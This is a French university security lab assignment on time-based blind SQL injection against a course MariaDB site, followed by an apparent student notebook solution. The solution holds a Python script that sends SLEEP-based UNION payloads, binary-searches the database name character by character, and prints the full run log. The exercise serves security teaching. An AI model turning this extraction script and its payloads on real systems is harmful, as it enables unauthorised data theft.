# ipl I317B Sécurité : labos
## Projet 1 : exploitation SQL à l'aveugle

Pour ce premier projet (qui originellement était le dernier exercice de la semaine 3), vous allez procéder à des injections à l'aveugle. En effet, la page suicitant notre intérêt pour ce projet ne contient pas grand chose à part un bouton ... mais elle est injectable (promis) !

http://labosecuipl.alwaysdata.net/20/s03/ex2/


Cette fois-ci, le moteur de base de donnée présent derrière ce site n'est plus du sqlite mais du MariaDB. Votre objectif pour ce projet est de récupérer le nom de la base de donnée.

1. Premièrement, vous devrez analyser ce site pour trouver où faire votre injection. Comme l'indique le nom de ce projet, votre injection sera à l'aveugle, vous ne devez donc pas vous attendre à percevoir le moindre résultat pour celle-ci, aucune valeur présente sur le site ne dépend de la réusite de votre injection (par exemple: oui, la couleur du titre est *vraiment* aléatoire).  
   Pour vous aider dans votre démarche, voici quelques *gros* indices :
  - MariaDB dispose d'une fonction sleep ( https://mariadb.com/kb/en/sleep/ ) qui va faire "dormir" le code un certain nombre de seconde. La base de donnée mettra donc plus de temps avant de retourner un résultat.
  - SQL, comme d'autres langages, fait une évaluation paresseuse (lazy) des conditions. Celles-ci sont évaluée de gauche à droite et si la logique booleen le permet, les parties inutiles sont ignorées.  
    > L'exemple suivant est en python mais le comportement SQL est le même :
    > - `if False and 1/0:` ne créera pas d'exception malgré la présence d'une division par zéro.
    > - `if True and 1/0:` créera une exception `ZeroDivisionError`.
    >  
    > En effet, dans le premier cas, le résultat de `Faux ET ?` sera toujours faux ([logique booléen](https://fr.wikipedia.org/wiki/Alg%C3%A8bre_de_Boole_(logique)#Conjonction)), il n'est donc pas nécessaire d'évaluer la suite de l'expression et python ne "voit" donc même pas la division par zéro.
    > 
    > Dans la deuxième expression `True ET ?`, toute l'expression dépend de ce qui se trouve après le `ET` et donc la suite de l'expression doit être évaluée.

2. Une fois l'injection trouvée et fonctionnelle, vous devrez coder un programme qui recherchera le nom de la base de donnée (voir: https://mariadb.com/kb/en/database/ ).  
   Au vue du type d'attaque que vous allez mener (ralenti par les `sleep`) et le nombre d'étudiant (pauvre serveur), je vous demande de coder intelligemment :
  - Un des buts évalué de ce projet est de réduire le nombre de requêtes nécessaire pour obtenir le résultat par exemple avec une [recherche dichotomique](https://fr.wikipedia.org/wiki/Recherche_dichotomique).
  - Un temps de sleep entre 2 et 5 secondes devrait être suffisant dans la majorité des cas (à moins que vous n'ayez une connection internet particulièrement instable).
  - (...)

  Afin d'aiguiller votre recherche, nous partons du postula que le nom de la base de donnée à trouver ne comprend que des charactères repris dans `[a-z0-9]` ainsi que le tiret `-` et le tiret du bas `_`. (Attention le tiret du bas à une [valeur particulière](https://www.w3schools.com/sql/sql_wildcards.asp) dans le `LIKE` sql.)
3. En plus du code du point précédent, vous rédigerez quelques lignes de texte pour décrire :
  - la localisation de la vulnérabilité et la requête SQL supposée derrière (La question classique "Qu'est-ce qui tourne derrière ?").
  - le format de votre injection.
  - d'éventuelles difficultées rencontrer pendant ce projet.
  
  Ce texte peut être présenté dans une cellule de type Markdown de votre jupyter notebook.

Le format de remise préféré est un jupyter notebook mais vous pouvez également fournir un fichier "*.py*" plus un *pdf* pour la partie textuelle.

La date de remise sur moodle est le dimanche 25 octobre à 23H59.

...

In [37]:
import requests
import time

In [58]:
"""
Fait une requete post pour voir si le caractère est {=, > ,<} au caractère dans la base de donnée à la position donnée
"""
def requestPost(caractere, position, comparateur):
    timeBeforeRequest = time.time()
    sqli = " '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), %s, 1) %s '%s' ;--" %(
        position, comparateur, caractere)
    print(sqli)
    page = requests.post(
        "http://labosecuipl.alwaysdata.net/20/s03/ex2/",
        data={
            "id": sqli}
    )
    timeAfterRequest = time.time()
    print(timeAfterRequest - timeBeforeRequest)
    if (timeAfterRequest - timeBeforeRequest > 3):
        return True
    else:
        return False
    
#requestPost('l', str(1), '=')

In [59]:
"""
Renvoie la position; 'a' représente le début de la liste et 'b' la fin de la liste, 'm' le milieu
"""
def recherche_dichotomique(liste_de_donnee, position, a, b):
    if b >= a:
        m = (a+b)//2
        print(m)
        print("traitement de : " + liste_de_donnee[m])
        if (requestPost(liste_de_donnee[m], position, '=')):
            return m
        elif (requestPost(liste_de_donnee[m], position, '<')): # le char est plus grand
            return recherche_dichotomique(liste_de_donnee, position, a, m-1)
        elif (requestPost(liste_de_donnee[m], position, '>')):
            return recherche_dichotomique(liste_de_donnee, position, m+1, b)
    else:
        return -1

In [62]:
# du plus petit char au plus grand
dictionnaire = ['-', '_', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f',
                'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'x', 'w',
                'y', 'z']
resultat = ""
position = 1

debut = time.time()
while 1:
    res = recherche_dichotomique(dictionnaire, str(position), 0, len(dictionnaire)-1)
    if (res != -1):
        print(res)
        resultat += dictionnaire[res]
        position += 1
        print(resultat)
    else:
        break

fin = time.time()
print(resultat)
print("temps mis: ")
print(fin - debut)

18
traitement de : g
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 1, 1) = 'g' ;--
0.06877875328063965
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 1, 1) < 'g' ;--
0.07315444946289062
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 1, 1) > 'g' ;--
3.08013653755188
28
traitement de : q
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 1, 1) = 'q' ;--
0.06134843826293945
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 1, 1) < 'q' ;--
3.17667818069458
23
traitement de : l
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 1, 1) = 'l' ;--
3.1867830753326416
23
l
18
traitement de : g
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) = 'g' ;--
0.07984638214111328
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) < 'g' ;--
3.0720174312591553
8
traitement de : 6
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) = '6' ;--
0.06949400901794434
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) < '6' ;--
0.06029701232910156
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) > '6' ;--
3.0715017318725586
13
traitement de : b
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) = 'b' ;--
0.06620001792907715
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) < 'b' ;--
3.070822238922119
10
traitement de : 8
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) = '8' ;--
0.06320667266845703
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) < '8' ;--
0.0652933120727539
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) > '8' ;--
3.0709877014160156
11
traitement de : 9
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) = '9' ;--
0.06939244270324707
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) < '9' ;--
0.061585426330566406
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) > '9' ;--
3.073201894760132
12
traitement de : a
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 2, 1) = 'a' ;--
3.066786289215088
12
la
18
traitement de : g
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 3, 1) = 'g' ;--
0.06385302543640137
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 3, 1) < 'g' ;--
3.0650343894958496
8
traitement de : 6
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 3, 1) = '6' ;--
0.07149982452392578
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 3, 1) < '6' ;--
0.07268428802490234
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 3, 1) > '6' ;--
3.0741336345672607
13
traitement de : b
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 3, 1) = 'b' ;--
3.0737133026123047
13
lab
18
traitement de : g
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 4, 1) = 'g' ;--
0.0845639705657959
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 4, 1) < 'g' ;--
0.06962108612060547
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 4, 1) > 'g' ;--
3.0661818981170654
28
traitement de : q
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 4, 1) = 'q' ;--
0.0859990119934082
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 4, 1) < 'q' ;--
3.199347972869873
23
traitement de : l
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 4, 1) = 'l' ;--
0.06658387184143066
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 4, 1) < 'l' ;--
0.07347822189331055
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 4, 1) > 'l' ;--
3.07617449760437
25
traitement de : n
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 4, 1) = 'n' ;--
0.06897091865539551
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 4, 1) < 'n' ;--
0.07457971572875977
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 4, 1) > 'n' ;--
3.0670955181121826
26
traitement de : o
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 4, 1) = 'o' ;--
3.0737345218658447
26
labo
18
traitement de : g
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 5, 1) = 'g' ;--
0.07642531394958496
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 5, 1) < 'g' ;--
0.06207847595214844
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 5, 1) > 'g' ;--
3.089285373687744
28
traitement de : q
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 5, 1) = 'q' ;--
0.1162714958190918
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 5, 1) < 'q' ;--
0.059572696685791016
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 5, 1) > 'q' ;--
3.0817553997039795
33
traitement de : v
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 5, 1) = 'v' ;--
0.08820199966430664
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 5, 1) < 'v' ;--
3.0655386447906494
30
traitement de : s
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 5, 1) = 's' ;--
3.092461347579956
30
labos
18
traitement de : g
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 6, 1) = 'g' ;--
0.23607444763183594
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 6, 1) < 'g' ;--
3.0650460720062256
8
traitement de : 6
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 6, 1) = '6' ;--
0.1141507625579834
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 6, 1) < '6' ;--
0.06885266304016113
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 6, 1) > '6' ;--
3.0811147689819336
13
traitement de : b
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 6, 1) = 'b' ;--
0.06953907012939453
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 6, 1) < 'b' ;--
0.06534242630004883
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 6, 1) > 'b' ;--
3.07486891746521
15
traitement de : d
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 6, 1) = 'd' ;--
0.1446216106414795
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 6, 1) < 'd' ;--
0.10909748077392578
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 6, 1) > 'd' ;--
3.063142776489258
16
traitement de : e
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 6, 1) = 'e' ;--
3.070298433303833
16
labose
18
traitement de : g
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 7, 1) = 'g' ;--
0.07000064849853516
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 7, 1) < 'g' ;--
3.0711846351623535
8
traitement de : 6
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 7, 1) = '6' ;--
0.07625818252563477
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 7, 1) < '6' ;--
0.06872940063476562
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 7, 1) > '6' ;--
3.2504594326019287
13
traitement de : b
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 7, 1) = 'b' ;--
0.06935262680053711
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 7, 1) < 'b' ;--
0.07735300064086914
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 7, 1) > 'b' ;--
3.069990396499634
15
traitement de : d
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 7, 1) = 'd' ;--
0.08621382713317871
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 7, 1) < 'd' ;--
3.065535068511963
14
traitement de : c
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 7, 1) = 'c' ;--
3.075718402862549
14
labosec
18
traitement de : g
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 8, 1) = 'g' ;--
0.2509925365447998
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 8, 1) < 'g' ;--
0.07259345054626465
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 8, 1) > 'g' ;--
3.0792627334594727
28
traitement de : q
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 8, 1) = 'q' ;--
0.07433819770812988
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 8, 1) < 'q' ;--
0.06864166259765625
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 8, 1) > 'q' ;--
3.078209400177002
33
traitement de : v
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 8, 1) = 'v' ;--
0.0847024917602539
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 8, 1) < 'v' ;--
3.0763931274414062
30
traitement de : s
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 8, 1) = 's' ;--
0.22038984298706055
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 8, 1) < 's' ;--
0.061728715896606445
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 8, 1) > 's' ;--
3.069399833679199
31
traitement de : t
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 8, 1) = 't' ;--
0.06730771064758301
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 8, 1) < 't' ;--
0.07213568687438965
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 8, 1) > 't' ;--

3.078505516052246
32
traitement de : u
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 8, 1) = 'u' ;--
3.0724027156829834
32
labosecu
18
traitement de : g
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 9, 1) = 'g' ;--
0.06731367111206055
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 9, 1) < 'g' ;--
0.14761972427368164
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 9, 1) > 'g' ;--
3.0915257930755615
28
traitement de : q
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 9, 1) = 'q' ;--
0.1035158634185791
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 9, 1) < 'q' ;--
3.075812816619873
23
traitement de : l
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 9, 1) = 'l' ;--
0.07402467727661133
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 9, 1) < 'l' ;--
3.0670225620269775
20
traitement de : i
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 9, 1) = 'i' ;--
3.0644309520721436
20
labosecui
18
traitement de : g
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 10, 1) = 'g' ;--
0.12766361236572266
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 10, 1) < 'g' ;--
0.18895506858825684
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 10, 1) > 'g' ;--
3.076110601425171
28
traitement de : q
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 10, 1) = 'q' ;--
0.06587338447570801
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 10, 1) < 'q' ;--
3.144343614578247
23
traitement de : l
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 10, 1) = 'l' ;--
0.08661127090454102
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 10, 1) < 'l' ;--
0.07852983474731445
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 10, 1) > 'l' ;--
3.0967063903808594
25
traitement de : n
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 10, 1) = 'n' ;--
0.08548426628112793
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 10, 1) < 'n' ;--
0.1307833194732666
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 10, 1) > 'n' ;--
3.076922655105591
26
traitement de : o
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 10, 1) = 'o' ;--
0.07406759262084961
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 10, 1) < 'o' ;--
0.08262944221496582
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 10, 1) > 'o' ;--
3.067234992980957
27
traitement de : p
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 10, 1) = 'p' ;--
3.6935622692108154
27
labosecuip
18
traitement de : g
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 11, 1) = 'g' ;--
0.0734102725982666
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 11, 1) < 'g' ;--
0.07430148124694824
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 11, 1) > 'g' ;--
3.078784704208374
28
traitement de : q
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 11, 1) = 'q' ;--
0.07799196243286133
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 11, 1) < 'q' ;--
3.0756404399871826
23
traitement de : l
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 11, 1) = 'l' ;--
3.070640802383423
23
labosecuipl
18
traitement de : g
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) = 'g' ;--
0.06213188171386719
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) < 'g' ;--
0.06772208213806152
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) > 'g' ;--
3.0780868530273438
28
traitement de : q
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) = 'q' ;--
0.06643939018249512
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) < 'q' ;--
0.07771492004394531
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) > 'q' ;--
3.081655740737915
33
traitement de : v
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) = 'v' ;--
0.06296801567077637
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) < 'v' ;--
0.06374001502990723
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) > 'v' ;--
3.0693840980529785
35
traitement de : w
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) = 'w' ;--
0.07170605659484863
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) < 'w' ;--
0.07767415046691895
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) > 'w' ;--
3.0925662517547607
36
traitement de : y
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) = 'y' ;--
0.06766724586486816
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) < 'y' ;--
0.07319784164428711
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) > 'y' ;--
3.064805269241333
37
traitement de : z
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) = 'z' ;--
0.07546544075012207
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) < 'z' ;--
0.061914682388305664
 '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), 12, 1) > 'z' ;--
3.075092077255249
labosecuipl
temps mis:
179.9184718132019

SELECT <'champ'> FROM <'table_name'> WHERE id = '<id>' --> Comme l'id n'est pas un string il ne faut pas fermer les quotes ''. ce n'est pas ça where id = '<id>' mais plus ça where id = <id>.

SELECT DATABASE() permet de récupérer le nom de la base de donnée mais comme sur le site il n'y a pas de retour on ne peut pas recevoir le résultat. Le but étant de faire du "brut force" pour que deviner le nom de la table. A chaque fois qu'on devine un caractère on fait endormir la requete grace à sleep(5) si elle s'endort ça veut dire qu'on a trouver un caractère.

Lors de l'injection plusieurs cas peuvent se produire : 
    - le 'code' dort pendant x secondes où x est determiner dans sleep(x). Dans le cas où la condition where est respecté. 
    - le 'code' ne dort pas alors le resultat de la requete est directement envoyer. La condition where n'a pas été respecté. 

Pour voir si le code a dormi ou pas ne manière automatique, il faut utiliser Time. Dans le cas où currentTime - oldTime est plus petit (<) que 5 alors ça veut dire que la requête n'a même pas dormi 5 secondes. Dans le cas contraire elle a dormi 5 secondes. Ce qui veut dire qu'on peut enregistrer le char

Pseudo-code : 

recherche_dichotomique_récursive(liste_triée):
   len = longueur de liste_triée ;
   m = len / 2 ;
   si requestPostEqual(liste_triée[m]) :
       ajouter m au string de résultat et recommencer la recherche dicotomique en changeant la position du caractère;
   si requestPostGreater(liste_triée[m]) :
       renvoyer recherche_dichotomique_récursive(liste_triée[1:m-1]) ; // partie inférieur du tableau
   sinon :
       renvoyer recherche_dichotomique_récursive(liste_triée[m+1:len]) ; // partie supérieur du tableau